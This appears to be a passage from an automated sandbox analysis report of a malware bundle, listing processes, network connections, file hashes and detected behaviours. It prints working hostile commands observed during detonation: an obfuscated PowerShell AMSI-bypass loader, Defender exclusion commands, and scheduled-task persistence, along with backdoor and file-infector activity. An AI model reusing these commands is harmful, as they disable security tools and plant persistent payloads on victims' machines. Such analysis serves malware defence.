C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe c433d048eb1e844cc12215c24ac88b7f P7kiv3bMr0C2WxY/1AC6qw.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:MlddtWyOVLTW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JUtmYuQkexpjJE,[Parameter(Position=1)][Type]$KnTJBWhiuA)$QWnwIixgpdT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+'la'+'s'+'s,'+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'la'+'s'+'s'+','+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QWnwIixgpdT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+'i'+'d'+'e'+'B'+'ySig,Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JUtmYuQkexpjJE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$QWnwIixgpdT.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$KnTJBWhiuA,$JUtmYuQkexpjJE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+'e'+'d');Write-Output $QWnwIixgpdT.CreateType();}$mSwoYymFuWlVE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+[Char](97)+'t'+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$zUmNWvNEfvGxgY=$mSwoYymFuWlVE.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'rocA'+[Char](100)+''+[Char](100)+'re'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lEztCYVLuVtJPkcYJYi=MlddtWyOVLTW @([String])([IntPtr]);$jICCRMIPPqRnYXtvJdldLM=MlddtWyOVLTW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KIwfODEbxgj=$mSwoYymFuWlVE.GetMethod('Ge'+'t'+''+'M'+'o'+'d'+''+'u'+'le'+'H'+''+[Char](97)+''+'n'+''+'d'+'le').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$OeAuXBiyErhtak=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$BOchzXxqRvbXTKEFb=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$KIwfODEbxgj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'al'+[Char](80)+'ro'+'t'+''+[Char](101)+''+[Char](99)+'t')));$CXOJPir=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeAuXBiyErhtak,$lEztCYVLuVtJPkcYJYi).Invoke('a'+'m'+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jIaFoqTzGsQyvAiqw=$zUmNWvNEfvGxgY.Invoke($Null,@([Object]$CXOJPir,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$NqCesFVuxP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,4,[ref]$NqCesFVuxP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jIaFoqTzGsQyvAiqw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BOchzXxqRvbXTKEFb,$jICCRMIPPqRnYXtvJdldLM).Invoke($jIaFoqTzGsQyvAiqw,[uint32]8,0x20,[ref]$NqCesFVuxP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+'o'+''+[Char](100)+''+'e'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d71cd49a-0d08-422d-a6a6-1cd83e29f9ab}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
Files
memory/3816-0-0x00007FFC6F2B3000-0x00007FFC6F2B5000-memory.dmp
memory/3816-1-0x0000000000EB0000-0x0000000000F12000-memory.dmp
memory/2344-2-0x000001EBB1E30000-0x000001EBB1E52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mucxyq.10e.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2344-12-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-13-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-14-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-15-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-16-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/2344-19-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/3816-22-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
| SHA512 | 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | af1cc13f412ef37a00e668df293b1584 |
| SHA1 | 8973b3e622f187fcf484a0eb9fa692bf3e2103cb |
| SHA256 | 449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037 |
| SHA512 | 75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3 |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/3552-61-0x0000000000AA0000-0x0000000000AC2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70e829e200994d93172199e56c369439 |
| SHA1 | 051915bb2944acc4de6b948913c7cfddaebd3aa2 |
| SHA256 | 5c09ae4bd7edd4d26fc157b2eeaf2c1dfe81dc9ff551c5f359773443de7b0d1f |
| SHA512 | b722a32b6b13a8f536743699ec13b6e2c6c8532cb2b2652d6c3b561b970e2a542f8e88b1644d91b8ace8d7ea6313ad667d0e8d3b4c6f5a51f560ded716c407fe |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3816-100-0x00007FFC6F2B0000-0x00007FFC6FD72000-memory.dmp
memory/1052-101-0x00000000002A0000-0x00000000002C2000-memory.dmp
memory/1704-102-0x000001FB289B0000-0x000001FB289DA000-memory.dmp
memory/1704-104-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp
memory/1704-103-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp
memory/1692-108-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-112-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1692-114-0x00007FFC8CDB0000-0x00007FFC8CE6D000-memory.dmp
memory/1692-115-0x0000000140000000-0x0000000140008000-memory.dmp
memory/684-136-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/684-135-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp
memory/480-156-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/480-155-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp
memory/480-150-0x000001FC93D60000-0x000001FC93D8A000-memory.dmp
memory/424-166-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/424-165-0x000002A41A960000-0x000002A41A98A000-memory.dmp
memory/424-160-0x000002A41A960000-0x000002A41A98A000-memory.dmp
memory/964-146-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/964-145-0x0000025886BA0000-0x0000025886BCA000-memory.dmp
memory/964-140-0x0000025886BA0000-0x0000025886BCA000-memory.dmp
memory/684-131-0x000002ECB6EB0000-0x000002ECB6EDA000-memory.dmp
memory/632-126-0x00007FFC4D690000-0x00007FFC4D6A0000-memory.dmp
memory/632-125-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-120-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-119-0x000002807B060000-0x000002807B08A000-memory.dmp
memory/632-118-0x000002807B030000-0x000002807B055000-memory.dmp
memory/1692-113-0x00007FFC8D610000-0x00007FFC8D808000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
159s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3364 wrote to memory of 4632 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Bdaejec
Bdaejec family
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdb.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsimport.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\dotnet.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVLP.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\plugin-container.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpEng.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseIdentity.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstatd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
